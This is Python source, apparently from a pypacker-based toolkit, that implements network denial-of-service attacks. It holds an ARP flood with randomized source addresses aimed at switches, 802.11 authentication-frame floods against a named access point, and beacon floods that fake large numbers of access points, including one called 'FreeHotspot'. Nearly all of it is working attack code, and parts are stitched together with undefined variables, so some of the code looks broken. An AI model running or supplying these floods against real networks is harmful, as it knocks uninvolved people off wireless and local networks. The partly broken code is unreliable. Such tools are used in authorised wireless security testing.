def arp_cb(pargs):
"""ARP DoS, eg for switches"""
#logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst)
pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REQUEST)
pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REPLY)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
# request from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_req.src = mac
pkt_arp_req.arp.sha = mac
pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_req.bin())
# response from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_resp.src = mac
pkt_arp_resp.arp.sha = mac
pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_resp.bin())
psock.close()
def wifi_authdos_cb(pargs):
"""
Authentication frames DoS
"""
radiotap_ieee80211 = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
radiotap_ieee80211_auth = radiotap_ieee80211 + auth
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
channel = int(pargs.channels.split(",")[0])
logger.debug("sending %d deauth to %r on channel %d", pargs.count,
pargs.mac_dst, channel)
utils.switch_wlan_channel(pargs.iface_name,
int(pargs.channels.split(",")[0]))
for cnt in range(pargs.count):
if cnt & 15 == 0:
print(".", end="")
sys.stdout.flush()
auth.src = pypacker.get_rnd_mac()
try:
psock_send.send(radiotap_ieee80211_auth.bin())
except socket.timeout:
# timeout on sending? that's ok
pass
print("")
psock_send.close()
def send_auth(mac):
"""Send authentications to ap having mac 'mac'"""
auth_req = copy.deepcopy(auth_req_orig)
start_time = time.time()
for i in range(1000000):
if i % 500 == 0:
diff = time.time() - start_time
print("%d pps" % (i / diff))
auth_req[ieee80211.IEEE80211.Auth].src = pypacker.get_rnd_mac()
try:
psocket.send(auth_req.bin())
except socket.timeout:
# timeout on sending? that's ok
pass
def send_beacon(_):
"""Send beacon having mac 'mac'"""
beacon = copy.deepcopy(beacon_orig)
start_time = time.time()
aps_per_channel = 5
current_channel = 1
for i in range(1, 10000):
if i % 100 == 0:
diff = time.time() - start_time
print("%d pps" % (i / diff))
if i % aps_per_channel == 0:
current_channel += 1
current_channel %= 13
if current_channel == 0:
current_channel = 1
# utils.switch_wlan_channel(wlan_monitor_if, current_channel)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
_beacon.src = mac
_beacon.bssid = mac
# set new ssid
_beacon.params[0].body_bytes = bytes("".join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)), "ascii")
# print(_beacon.params[0].body_bytes)
_beacon.seq = 0
# print(_beacon)
try:
for x in range(100):
# send multiple beacons for every ap
psocket.send(beacon.bin())
_beacon.seq = x
# _beacon.ts = x << (8*7)
_beacon.ts = x
except socket.timeout:
# timeout on sending? that's ok
pass
import time
# name of monitor interface to use
wlan_monitor_if = "prism0"
# MAC address of access point
ap_mac = "00:11:22:33:44:55"
mon_sock = psocket.SocketHndl(wlan_monitor_if)
auth_req = prism(len=24) +\
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=1, from_ds=0) +\
ieee80211.IEEE80211.MGMTFrame(dst_s=ap_mac, bssid_s=ap_mac) +\
ieee80211.IEEE80211.Auth(auth_seq=1)
print("starting DOS attack on AP %s" % ap_mac)
for i in range(10000):
#drvinfo = radiotap.Radiotap(raw_bytes)
drvinfo = prism.Prism(raw_bytes)
start_time = time.time()
if i % 100 == 0:
diff = time.time()-start_time
print("%d pps" % (100/diff) )
try:
auth_req[ieee80211.IEEE80211.MGMTFrame].src = pypacker.get_rnd_mac()
psocket.send(auth_req.bin())
except Exception as e:
mon_sock.close()
print(e)
def wifi_ap_ie_cb(pargs):
"""
Create fake APs using various IEs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
]
)
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "012"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
ie_cnt = 0
pkt_cnt = 0
PACKETS_PER_CHANNEL = 3
for _ in range(pargs.count):
if not pargs.is_running:
break
for channel in channels:
if pkt_cnt % (256) == 0:
print("%d packets sent, ch: %d \r" % (pkt_cnt, channel),
end="")
sys.stdout.flush()
_beacon.params[2].body_bytes = pack_B(channel)
utils.switch_wlan_channel(pargs.iface_name, channel)
#logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
pkt_cnt += 256
try:
for ie_id in range(256):
_beacon.params[5].id = ie_id
mac = pypacker.get_rnd_mac()
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = get_random_essid()
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
for _ in range(PACKETS_PER_CHANNEL):
_beacon.seq = ie_id
# _beacon.ts = x << (8*7)
_beacon.ts = ie_id * 20
# time.sleep(0.01)
psock_send.send(beacon.bin())
time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning(
"buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
ie_cnt = (ie_cnt + 1) & 0xFF
psock_send.close()
def wifi_ap_cb(pargs):
"""
Create a massive amount of fake APs
"""
if pargs.channels is not None:
channels = [int(channel) for channel in pargs.channels.split(",")]
else:
channels = utils.get_available_wlan_channels(pargs.iface_name)
beacon_orig = radiotap.Radiotap() + \
ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
ieee80211.IEEE80211.Beacon(
dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
beacon = copy.deepcopy(beacon_orig)
_beacon = beacon[ieee80211.IEEE80211.Beacon]
mac = pypacker.get_rnd_mac()
essid = "FreeHotspot"
_beacon.src = mac
_beacon.bssid = mac
_beacon.params[0].body_bytes = bytes(essid, "ascii")
_beacon.params[0].len = len(essid)
_beacon.params[2].body_bytes = pack_B(channels[0])
_beacon.seq = 0
_beacon.interval = 0xFFFF
# adaptive sleeptime due to full buffer on fast sending
sleeptime = 0.000001
rand_mac = True
rand_essid = True
pargs.is_running = True
logger.info("faking APs on the following channels %r", channels)
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
cnt = 0
rounds = 0
PACKETS_PER_CHANNEL = 3
starttime = time.time()
_beacon.params[2].body_bytes = pack_B(channels[0])
utils.switch_wlan_channel(pargs.iface_name, channels[0])
for _ in range(pargs.count):
if not pargs.is_running:
break
if cnt & 0xF == 0:
print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
sys.stdout.flush()
if time.time() - starttime > 60:
rounds += 1
cnt = 0
cnt_bts = unpack_I(cnt)[0][-3:]
cnt += 1
if rand_mac:
mac = pypacker.get_rnd_mac()[:3] + cnt_bts
_beacon.src = mac
_beacon.bssid = mac
if rand_essid:
_beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
_beacon.params[0].len = len(_beacon.params[0].body_bytes)
try:
_beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
_beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL
for cnt_ap in range(PACKETS_PER_CHANNEL):
# send multiple beacons for every ap
psock_send.send(beacon.bin())
_beacon.seq += 1
_beacon.ts += 0x100
#time.sleep(sleeptime)
except socket.timeout:
# timeout on sending? that's ok
pass
except OSError:
sleeptime *= 10
print()
logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
sleeptime)
time.sleep(1)
psock_send.close()